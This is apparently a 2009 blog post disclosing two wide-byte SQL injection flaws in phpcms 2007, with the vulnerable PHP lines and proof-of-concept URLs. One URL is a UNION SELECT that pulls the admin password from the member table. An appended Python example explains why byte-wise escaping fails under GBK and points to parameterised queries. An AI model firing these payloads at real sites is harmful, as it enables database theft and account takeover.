phpcms 2007: the last two injections.
Sunday, 23 August 2009. These have all been played to death already, so please don't laugh, big guys~~
====================================================================
message/friend.php
............................................................
if ($_username != $username)
{
if ($action == 'add')
{
$res = $db->query("SELECT userid FROM ".TABLE_MEMBER." where username='$username'");
............................................................
http://127.0.0.1/phpcms/message/friend.php?action=add&username=luoye%cf'
=====================================================================
house/web.php
............................................................
if($username)
{
$r = $db->get_one("SELECT * FROM ".TABLE_MEMBER." m,".TABLE_MEMBER_INFO." i WHERE m.username='".$username."' AND m.userid=i.userid");
............................................................
http://127.0.0.1/phpcms/house/web.php?username=luoye%cf'
=====================================================================
Test for sp6: http://127.0.0.1/phpcms/house/web.php?username=luoye%cf'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,password,65/**/from/**/phpcms_member/**/where/**/userid=1/*
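Why the %cf' payload above gets a quote past the escaping, and how a charset-aware escape closes the hole, as an added example that is not part of the original post or of phpcms: the escaping functions, the query-building helper and the sample input are assumptions, the byte-wise escaper only models how PHP's addslashes()/magic_quotes behaved, and the table name phpcms_member is taken from the page.

```python
# Added example (not phpcms code): byte-wise escaping versus a GBK-aware escape.

def addslashes(raw: bytes) -> bytes:
    """Byte-oriented escaping, modelled on PHP's addslashes() / magic_quotes_gpc."""
    out = bytearray()
    for c in raw:
        if c in b"'\"\\\x00":
            out.append(0x5C)  # put a backslash in front of the dangerous byte
        out.append(c)
    return bytes(out)

def escape_gbk_aware(raw: bytes) -> bytes:
    """Escape per character, not per byte: decode as GBK first, the way an
    escaper that knows the connection charset does (assumed helper)."""
    text = raw.decode("gbk", errors="replace")
    escaped = "".join("\\" + ch if ch in "'\"\\\x00" else ch for ch in text)
    return escaped.encode("gbk", errors="replace")

def build_query(escape, username: bytes) -> bytes:
    """String concatenation exactly as message/friend.php does it."""
    return (b"SELECT userid FROM phpcms_member WHERE username='"
            + escape(username) + b"'")

def unescaped_quotes(sql: bytes) -> int:
    """Count the single quotes the server treats as real delimiters once it
    decodes the statement as GBK. A well-formed query here has exactly two."""
    text = sql.decode("gbk", errors="replace")
    count, i = 0, 0
    while i < len(text):
        if text[i] == "\\":
            i += 2  # a backslash escapes the next character
            continue
        if text[i] == "'":
            count += 1
        i += 1
    return count

# Constructed input: the page's username value, GBK lead byte 0xCF then a quote.
PAYLOAD = b"luoye\xcf'"

if __name__ == "__main__":
    # addslashes yields CF 5C 27; GBK reads CF 5C as one character and the
    # quote stands alone, so the literal is terminated early.
    print(unescaped_quotes(build_query(addslashes, PAYLOAD)))        # 3
    # decoding first means the stray lead byte never swallows the backslash.
    print(unescaped_quotes(build_query(escape_gbk_aware, PAYLOAD)))  # 2
```

The parameterised-query equivalent (a placeholder bound through the driver) never concatenates the value into the statement at all, which is why it is the fix of choice rather than better escaping.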